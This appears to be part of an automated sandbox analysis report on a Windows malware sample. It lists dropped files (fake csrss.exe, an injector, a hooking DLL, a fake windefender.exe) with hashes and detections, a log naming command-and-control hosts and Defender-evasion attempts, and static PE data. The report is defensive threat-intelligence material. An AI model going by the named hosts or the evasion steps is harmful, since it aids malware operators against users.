                                                                                                                              Size (bytes):7680
                                                                                                                              Entropy (8bit):4.486535052248291
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                              MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                              SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                              SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                              SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65536
                                                                                                                              Entropy (8bit):0.10988191430411122
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:26wtzXm/Ey6q99957WHrNq3qQ10nMCldimE8eawHjchv:26zl680rgLyMCldzE9BHjcZ
                                                                                                                              MD5:B9C1230DB14496DE6055D5B6E9395E4A
                                                                                                                              SHA1:F4933EDEDCD7E32DB93E4DCF96B0714A5B8B1E16
                                                                                                                              SHA-256:978DEAF640341549BBA60EA2CE13B308D8F309C5904AEA1F2D4765C5006EBF34
                                                                                                                              SHA-512:04338F1EC0EEF0A12A1E829D9996DDE13192508FFA6F9ED121E1E4E606A8CD284E38FCE2C5CB396F2D4238CA72DC6B9BE97D1290DF495BB1CDBC6219EF687937
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: ................................................................................@...X....7.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@...X....?......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65536
                                                                                                                              Entropy (8bit):0.11233272756144043
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:60zXm/Ey6q99957R1miM3qQ10nMCldimE8eawHza1miIbCf:ml68D1tMLyMCldzE9BHza1tIG
                                                                                                                              MD5:9F9B3B15512D21DE1F624BCCCBCF0F4F
                                                                                                                              SHA1:DEA05AE8627BF2C6EDE583F509E165FAF68B6602
                                                                                                                              SHA-256:AD26EEE8AA560B016F1437E44671E97EB333869C71E61525FB44F6DEEF5FF268
                                                                                                                              SHA-512:D45CF8453A2BD24CAD37D59DF48981B60117C649F153D242668F47467C92C236902C6937E2B56CB9D47F2EA34B71FBEE8C9D9DA3F72E9010D99B9BDBE09613B1
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: ................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@...X...+......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65536
                                                                                                                              Entropy (8bit):0.11225190051937713
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:izXm/Ey6q999579b71mK2P3qQ10nMCldimE8eawHza1mKKf:nl68f71iPLyMCldzE9BHza1W
                                                                                                                              MD5:0650567BEB256DCD76B37081C6665CAB
                                                                                                                              SHA1:BB72A9E9E7991547FA2A3240E271F72A16EDA5DC
                                                                                                                              SHA-256:7B401C77E4C590753E912829E138AC04D29F8A73E485D3FB2E0E579215918014
                                                                                                                              SHA-512:223A317C6C4ED1170FD137BFB2152FD2E44617601E60C4939844A5D93F7E2F5CD20335E54061DF7B49F3288A6C4582B6EE32B1F6AD6C347701D8621B0962822E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: ................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... .........~...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@...X..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):101376
                                                                                                                              Entropy (8bit):5.951577458824018
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                                                                                              MD5:09031A062610D77D685C9934318B4170
                                                                                                                              SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                                                                                              SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                                                                                              SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):288256
                                                                                                                              Entropy (8bit):6.31266455792162
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                                                                                              MD5:D98E33B66343E7C96158444127A117F6
                                                                                                                              SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                                                                                              SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                                                                                              SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001@. (copy)
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65536
                                                                                                                              Entropy (8bit):0.10988191430411122
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:26wtzXm/Ey6q99957WHrNq3qQ10nMCldimE8eawHjchv:26zl680rgLyMCldzE9BHjcZ
                                                                                                                              MD5:B9C1230DB14496DE6055D5B6E9395E4A
                                                                                                                              SHA1:F4933EDEDCD7E32DB93E4DCF96B0714A5B8B1E16
                                                                                                                              SHA-256:978DEAF640341549BBA60EA2CE13B308D8F309C5904AEA1F2D4765C5006EBF34
                                                                                                                              SHA-512:04338F1EC0EEF0A12A1E829D9996DDE13192508FFA6F9ED121E1E4E606A8CD284E38FCE2C5CB396F2D4238CA72DC6B9BE97D1290DF495BB1CDBC6219EF687937
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: ................................................................................@...X....7.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@...X....?......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65536
                                                                                                                              Entropy (8bit):0.11233272756144043
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:60zXm/Ey6q99957R1miM3qQ10nMCldimE8eawHza1miIbCf:ml68D1tMLyMCldzE9BHza1tIG
                                                                                                                              MD5:9F9B3B15512D21DE1F624BCCCBCF0F4F
                                                                                                                              SHA1:DEA05AE8627BF2C6EDE583F509E165FAF68B6602
                                                                                                                              SHA-256:AD26EEE8AA560B016F1437E44671E97EB333869C71E61525FB44F6DEEF5FF268
                                                                                                                              SHA-512:D45CF8453A2BD24CAD37D59DF48981B60117C649F153D242668F47467C92C236902C6937E2B56CB9D47F2EA34B71FBEE8C9D9DA3F72E9010D99B9BDBE09613B1
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: ................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@...X...+......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy)
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65536
                                                                                                                              Entropy (8bit):0.11225190051937713
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:izXm/Ey6q999579b71mK2P3qQ10nMCldimE8eawHza1mKKf:nl68f71iPLyMCldzE9BHza1W
                                                                                                                              MD5:0650567BEB256DCD76B37081C6665CAB
                                                                                                                              SHA1:BB72A9E9E7991547FA2A3240E271F72A16EDA5DC
                                                                                                                              SHA-256:7B401C77E4C590753E912829E138AC04D29F8A73E485D3FB2E0E579215918014
                                                                                                                              SHA-512:223A317C6C4ED1170FD137BFB2152FD2E44617601E60C4939844A5D93F7E2F5CD20335E54061DF7B49F3288A6C4582B6EE32B1F6AD6C347701D8621B0962822E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: ................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... .........~...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@...X..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Windows\Logs\CBS\CBS.log
                                                                                                                              Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):3080192
                                                                                                                              Entropy (8bit):5.314134900056241
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqIH:TL1dq
                                                                                                                              MD5:5BF8CD4D050C7640194325FE121E8886
                                                                                                                              SHA1:83D2DCBD96140CCC5896D3EC79C2B481B14A524B
                                                                                                                              SHA-256:3AC1C4CCE204DCCFC7581EF86D20DD28E1496F513312B73F248F943A940E56F1
                                                                                                                              SHA-512:0363DEF01DEB43F1AD359F8B49FECA6E42DD37DF5D7B8AC670850C1D1C997E3D347939F9730545FD55FC5AD98317A4131C6D08E83C7753506C49FDAF17E1D6D1
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211112_043505_916.etl
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8192
                                                                                                                              Entropy (8bit):3.328987175125568
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:3C+Jeds2o+0K5Xu9m2YJmCevI2lQSkOP4BlT24YFziUMC76JRu:S+cil4Z2XpkCMI
                                                                                                                              MD5:FD0FBCD9E16EBD9FCC463C657E7AFF25
                                                                                                                              SHA1:69CDF2BB24FF95CD91EF51354C3409BE0EAA81A6
                                                                                                                              SHA-256:A6141FB04E6906E5661120237D2B92273DDA107021B8978DEF2C186AC2B3199D
                                                                                                                              SHA-512:B38239E40FA8061EAF0A4B49F3065158A1B94DD5125E83661B78C3AE5F4F0FC513AA863088015538EE34FAF8B6E86ECE6C03D6E60B58B357D04785C6F4D1A768
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: .... ... ....................................... ...!...............................T............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........~...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.1.2._.0.4.3.5.0.5._.9.1.6...e.t.l.........P.P.....T...........................................................................................................................................................................................................................................................................
                                                                                                                              C:\Windows\rss\csrss.exe
                                                                                                                              Process:C:\Users\user\Desktop\1dyvctHqv1.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4534824
                                                                                                                              Entropy (8bit):7.94859431801313
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:98304:3Xj3/ubRQm+WroFA4ER90iSogFPCINkyYQaf+wl9p/:HTw+TuHf4Fd6yLSX
                                                                                                                              MD5:430E6667D7609792F43EF40150050E19
                                                                                                                              SHA1:A2766C9BC772D3E5970AD00D25DDD460DFC9322C
                                                                                                                              SHA-256:1E227B989A219D8A1BA81633A8FF218E1ACD87EC718382C0CB3CE5166D3F8C00
                                                                                                                              SHA-512:379C77B619A279496DAD41FFBDD3430544BC97A5B429B01C73E298EA2F7A6586F82EBC93A2A945F26DC3155AF2E270D693A2E1D6075675265318E2455D802822
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2T.2T.2T..T.2T..T.2T..T..2T..T.2T.3TJ.2T..T.2T..T.2T..T.2TRich.2T................PE..L...YU._..................C...p.....`.A.......C...@..................................E.......................................C.P.......X^...........*E.(....p......P.................................A.@............................................text.....C.......C................. ..`.data...tho...C.......C.............@....rsrc...X^.......`....C.............@..@.reloc... ...p..."....D.............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Windows\windefender.exe
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2102272
                                                                                                                              Entropy (8bit):7.879347868736008
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                                                                                              MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                                              SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                                                                                              SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                                                                                              SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                                                                                              \Device\Null
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1893
                                                                                                                              Entropy (8bit):4.99447065090581
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:VgOB9oU6B9r5ExQI7mcaKM4u2/dS1oC/dS1nz:Vgnp5ExQI7hM4u2VSjVSZ
                                                                                                                              MD5:7F35B09F9F25F6C5E461AFC2FF7994D7
                                                                                                                              SHA1:C7F60DFCB039B3E52E76F9E6769DEC7C564C4114
                                                                                                                              SHA-256:92BD529AABC12538E09AA1D48E52EA79AA455B8E58A224630CCF5392F2FA9D49
                                                                                                                              SHA-512:F9AAF8F17A6A928D490DFB429629691194DE097AE5441CB0E1E59D7959C154A26849C17DB6AF3D7317019CC0F9F88AFE88763D86F961301ACEF754EC8F8B2F45
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: 2021/11/11 20:35:28 servers count 16.2021/11/11 20:35:28 logs endpoint https://runmodes.com/api/log.2021/11/11 20:35:28 initial server https://server3.trumops.com.2021/11/11 20:35:28 first install, ignore discover on start.2021/11/11 20:35:28 default browser ChromeHTML.2021/11/11 20:35:32 before EfiGuard.2021/11/11 20:35:36 poll response body {"signature":"6fc4f105cf61f304ed46b9f03bfa441f52c9e9b07f716e74998b56bf1429c7c04b25cb99a774c7d0caa79c6cc78bf9813336f45a71d4a270bf12afe2630fde08"}.2021/11/11 20:35:36 poll signature verified 6fc4f105cf61f304ed46b9f03bfa441f52c9e9b07f716e74998b56bf1429c7c04b25cb99a774c7d0caa79c6cc78bf9813336f45a71d4a270bf12afe2630fde08.2021/11/11 20:35:39 reboot in 1s.2021/11/11 20:35:40 rebooting now.2021/11/11 20:35:44 failed to hide app: unacceptable PGDSE state: 65.2021/11/11 20:35:47 couldn't exclude temp defender: couldn't create device: The system cannot find the file specified..2021/11/11 20:35:47 service is not running.2021/11/11 20:35:47 service needs an up

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Entropy (8bit):7.94859431801313
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:1dyvctHqv1.exe
                                                                                                                              File size:4534824
                                                                                                                              MD5:430e6667d7609792f43ef40150050e19
                                                                                                                              SHA1:a2766c9bc772d3e5970ad00d25ddd460dfc9322c
                                                                                                                              SHA256:1e227b989a219d8a1ba81633a8ff218e1acd87ec718382c0cb3ce5166d3f8c00
                                                                                                                              SHA512:379c77b619a279496dad41ffbdd3430544bc97a5b429b01c73e298ea2f7a6586f82ebc93a2a945f26dc3155af2e270d693a2e1d6075675265318e2455d802822
                                                                                                                              SSDEEP:98304:3Xj3/ubRQm+WroFA4ER90iSogFPCINkyYQaf+wl9p/:HTw+TuHf4Fd6yLSX
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\...2T..2T..2T...T..2T...T..2T...T..2T...T..2T..3TJ.2T...T..2T...T..2T...T..2TRich..2T................PE..L...YU._...........

                                                                                                                              File Icon

                                                                                                                              Icon Hash:a2e8e8e8a2a2a488

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x819e60
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:true
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x5F145559 [Sun Jul 19 14:14:49 2020 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:5
                                                                                                                              OS Version Minor:1
                                                                                                                              File Version Major:5
                                                                                                                              File Version Minor:1
                                                                                                                              Subsystem Version Major:5
                                                                                                                              Subsystem Version Minor:1
                                                                                                                              Import Hash:f3ed7d9c3a0be141edff0347fe399ebd

                                                                                                                              Authenticode Signature

                                                                                                                              Signature Valid:false
                                                                                                                              Signature Issuer:PostalCode=10301
                                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                              Error Number:-2146762487
                                                                                                                              Not Before, Not After
                                                                                                                              • 11/11/2021 11:24:05 AM 11/11/2022 11:24:05 AM
                                                                                                                              Subject Chain
                                                                                                                              • PostalCode=10301
                                                                                                                              Version:3
                                                                                                                              Thumbprint MD5:04FCA249099A61FA61BE244DDBB9EAEB
                                                                                                                              Thumbprint SHA-1:9C5051C15E85D45A8276B4628BAEBEF14F3AA86D
                                                                                                                              Thumbprint SHA-256:9D3A16DB77BCD71A7DB183660A83B99A8013E2397ED2953193ED3BA03D4C1A54
                                                                                                                              Serial:00C794307A62076B3E20E6E9A3C9CA994D

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              mov edi, edi
                                                                                                                              push ebp
                                                                                                                              mov ebp, esp
                                                                                                                              call 00007FA3447E705Bh
                                                                                                                              call 00007FA3447E2086h
                                                                                                                              pop ebp
                                                                                                                              ret
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              mov edi, edi
                                                                                                                              push ebp
                                                                                                                              mov ebp, esp
                                                                                                                              push FFFFFFFEh
                                                                                                                              push 00838B50h
                                                                                                                              push 0081EBA0h
                                                                                                                              mov eax, dword ptr fs:[00000000h]
                                                                                                                              push eax
                                                                                                                              add esp, FFFFFF98h
                                                                                                                              push ebx
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              mov eax, dword ptr [0083ABE0h]
                                                                                                                              xor dword ptr [ebp-08h], eax
                                                                                                                              xor eax, ebp
                                                                                                                              push eax
                                                                                                                              lea eax, dword ptr [ebp-10h]
                                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                                              mov dword ptr [ebp-18h], esp
                                                                                                                              mov dword ptr [ebp-70h], 00000000h
                                                                                                                              lea eax, dword ptr [ebp-60h]
                                                                                                                              push eax
                                                                                                                              call dword ptr [00401098h]
                                                                                                                              cmp dword ptr [02F2F870h], 00000000h
                                                                                                                              jne 00007FA3447E2080h
                                                                                                                              push 00000000h
                                                                                                                              push 00000000h
                                                                                                                              push 00000001h
                                                                                                                              push 00000000h
                                                                                                                              call dword ptr [00401124h]
                                                                                                                              call 00007FA3447E2203h
                                                                                                                              mov dword ptr [ebp-6Ch], eax
                                                                                                                              call 00007FA3447EA32Bh
